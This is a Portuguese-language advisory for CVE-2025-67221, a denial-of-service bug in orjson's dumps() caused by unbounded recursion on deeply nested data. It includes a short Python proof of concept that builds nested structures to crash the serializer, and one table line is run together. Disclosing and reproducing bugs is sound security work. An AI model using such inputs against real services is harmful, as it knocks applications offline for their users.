
Documentação e código de reprodução para CVE-2025-67221, uma vulnerabilidade de negação de serviço na função dumps() do orjson causada por recursão descontrolada ao serializar dados JSON profundamente aninhados.
| Campo | Valor |
|---|
| CVE ID | CVE-2025-67221 |
| Produto Afetado | orjson |
| Versões Afetadas | ≤ 3.11.4 |
| Tipo de Vulnerabilidade | Negação de Serviço (Recursão Não Controlada) |
| Vetor de Ataque | Remoto (se o atacante controlar dados serializados) |
Existe uma vulnerabilidade de negação de serviço na função orjson.dumps() no orjson versões 3.11.4 e anteriores. A função não impõe um limite de recursão ao serializar estruturas de dados JSON profundamente aninhadas. Um atacante que possa fazer com que uma aplicação serialize dados aninhados controlados pelo atacante pode desencadear uma falha na rotina de serialização.
orjson.dumps()pysrc/orjson/__init__.pyiTestado em
Aplicações que utilizam orjson para serializar estruturas de dados não confiáveis ou controladas pelo atacante podem ser vulneráveis a ataques de negação de serviço.
Código para replicar a vulnerabilidade localmente:
import orjson
import sys
import platform
print(f'OS: {platform.platform()}')
print(f'Python version: {sys. version}')
print(f'orjson version: {orjson.__version__}')
nested = []
for i in range(100):
nested = [{"level": i, "next": nested}]
dumped = orjson.dumps(nested)
O código acima leva a um belo core dump
